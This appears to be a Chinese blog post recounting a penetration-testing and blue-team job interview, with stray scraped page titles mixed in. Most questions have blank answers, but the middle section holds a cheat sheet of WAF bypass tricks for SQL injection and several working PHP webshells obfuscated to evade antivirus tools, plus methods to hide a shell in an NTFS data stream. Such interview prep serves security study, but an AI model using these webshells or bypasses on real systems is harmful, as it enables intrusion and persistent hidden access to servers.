【VMware虚拟机】安装Win10系统,附安装包秘钥/系统镜像/激活工具_哔哩哔哩_bilibili
hr:那比如说你现在在做监控对吧,比如说它这边报了个sql注入,你该怎么判断它是注入成功,还是失败呢,比如说这边有个告警
I:就是去看它有没有误判哎
hr:对,就看它有没有误报
I:xxx
我当时没有问是不是设备的误报。
反正我觉得碰到误报的话,就问一下是不是设备的误报
2022年蓝队初级护网总结_护网蓝队初级都干什么-CSDN博客
2022年蓝队初级面试题总结- Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者
要是看完就会发现,大厂都会在基础的上面,再去深入的提问。
所以说,基础要牢。
要是挖到过漏洞,就会问你怎么挖的,怎么绕过之类的,思路是什么,等你面试的时候,就会体会到了
hr:先自我介绍一下
I:面试官你好,我叫xxx,来自xxxxxx是一名大二在校生,学的专业是计算机网络技术,在校期间我参加过python程序设计实验室,编写过简单的python爬虫脚本(如爬取豆瓣数据之类的)。
专业技能的话,我熟悉常见的web漏洞和渗透测试工具的使用,然后我利用所学的专业技能,在漏洞盒子上提交过一些漏洞。
我个人比较认真负责,喜欢和志同道合的人研究技术,每天都会锻炼,去预防职业疾病。
最后,综上,我认为我的校园学习,我所掌握的能力,以及我做过的项目。我能够胜任这个渗透测试工程师(xxx)的岗位。
我的自我介绍完毕。
hr:之前有参加过国护吗
I:xxx
hr:然后你面的等级是蓝初对吧
I:xxx
hr:你的简历里面,写了熟悉代码审计是吧,然后有没有独立的审计出这个框架洞,或者,你是指那一种代审,拿到开发源代审吗
I:xxx
hr:ok,那你主要是做PHP代审,还是java代审
I:xxx
hr:这个内网渗透和域渗透都比较熟悉吗
I:xxx
hr:那问个经典的问题,黄金票据和白银票据了解吗
I: 1.白银票据是一个有效的票据授予服务(TGS)Kerberos票据,因为Kerberos验证服务运行的每台服务器都对服务主体名称的服务帐户进行加密和签名。
2.黄金票据是伪造TGT并且有效的获得任何Kerberos服务,而白银票据是伪造TGS。
hr:这个还比较熟悉app渗透测试和这个绕过防抓包的对吧
I:xxx
hr:那么APP这个里面的加壳了解吗
I:xxx
hr:比如说那个4j(我不知道是不是log4j,听的不是很清楚),常见的加壳,混淆壳,企业壳,这个脱壳你一般用什么手段呢 --这个hr的语速有点快,我尽量写的像样
I:xxx
hr:你还搞过Bypass是吧
I:xxx
hr:这个Bypass是注入的Bypass吗,还是什么Bypass
I:xxx
***绕sql的常见手法:wz
参数污染
内联注释
大小写绕过 (很老的WAF才有用)
替换绕过 (很老的WAF才有用)【和上传文件那个pphphp一样】
特殊符号绕过 (%0a换行)``
编码绕过 (比如会多次解码的东西,例如我们DOM XSS绕狗那个)
等价替换 (利用其它函数替代)[union #%0aselect 拦截][union all #%0aselect 不拦截]
容器特性(例如Apace的Hpp,或者是IIS的%分割)
白名单(管理员权限或者是127.0.0.1本地访问不拦截)
缓存区溢出 (数据太多了,超出了WAF检测的范围)
***绕防护软件(比如D盾之类的)的常见手法:wz
通过常量定义:
<?php define("a","$_GET[1]");eval(a);
------
通过字符串拼接 + 双美元符号:
<?php
$a='ass';
$b='ert';
$funcName=$a.$b;
$x='funcName';
$$x($_REQUEST[1]); # 用不了,就加个@符号
------
通过函数定义强行分割:
<?php
function a($a){
return $a;}
eval(a($_REQUEST)[1]);?>
------
通过类定义,然后传参强行分割:
<?php
class User
{
public $name = '';
function __destruct(){
eval("$this->name");
}
}
$user = new User;
$user->name = ''.$_REQUEST[1];
?>
------
多方式传参免杀:
<?php
$COOKIE = $_COOKIE;
foreach($COOKIE as $key => $value){
if($key=='assert'){
$key($_POST['s'];)
}
}
?>
<?php
$a=get_defined_functions();
$a['internal'][841]($_GET['a']);
------
拿到shell之后藏shell的妙招:ntfs文件流
<?php include('/:123.txt')?> + echo "<?php eval($_REQUEST[a])?>" >> /:123.txt
------
通过连接云主机数据库:
绕过市面上所有WAF(终极手法)
<?php
eval(mysqli_fetch_assoc(mysqli_query(mysqli_connect('127.0.0.1','root','root','maoshe'),'select * from info'))['info']);
hr:企业的SRC挖过吗,或者专属的SRC
I:xxx
hr:那你说一下,你对你挖到的公益SRC或者公益项目那个印象最深刻
I:xxx(这个看自己挖到的漏洞)
hr:那你讲一下,你的整体的渗透思路
I:xxx
hr:那你能讲一下,常见的报错注入有哪些函数吗
I:常用的报错注入的函数:
floor()函数、
exp()函数、
updatexml()函数、
join()函数、
extravalue()函数等
渗透思路大概说一下
2022年蓝队初级面试题总结- Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者
hr:那你当时是怎么判断,目标用的数据库呢
I:xxx
特殊符号,注释的判断
安顺序来
1,“null”和“%00”是Access支持的注释。
2,“#”是MySQL中的注释符,返回错误说明该注入点可能不是MySQL,另外也支持’-- ',和/* */注释(注意mysql使用-- 时需要后面添加空格)
3,“–”和/* */是Oracle,SQL server和MSSQL支持的注释符,如果正常,说明可能就是这仨了。
4,“;”是子句查询标识符,在Oracle中不支持多行查询,返回错误,很可能是Oracle数据库。
这样一串下来,基本就知道了数据库类型了
hr:对设备熟悉吗IDS和IPS
I:xxx
hr:linux命令熟悉吗,比如说怎么查进程的,知道吗
I:xxx
我习惯看这个linux的
Linux / Windows 中 进程 的 查看 和杀死_windows ps查看进程-CSDN博客
我习惯看这个windows的
window下强制杀死某个进程用taskkill /pid 进程号 -t -f命令_根据pid强杀进程命令-CSDN博客
日志分析的话,我习惯看这个
hr:linux Kernel定制任务了解吗
I:xxx
后面就没啦
失败乃是成功之母。
所有的成功,都是建立在失败之上
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。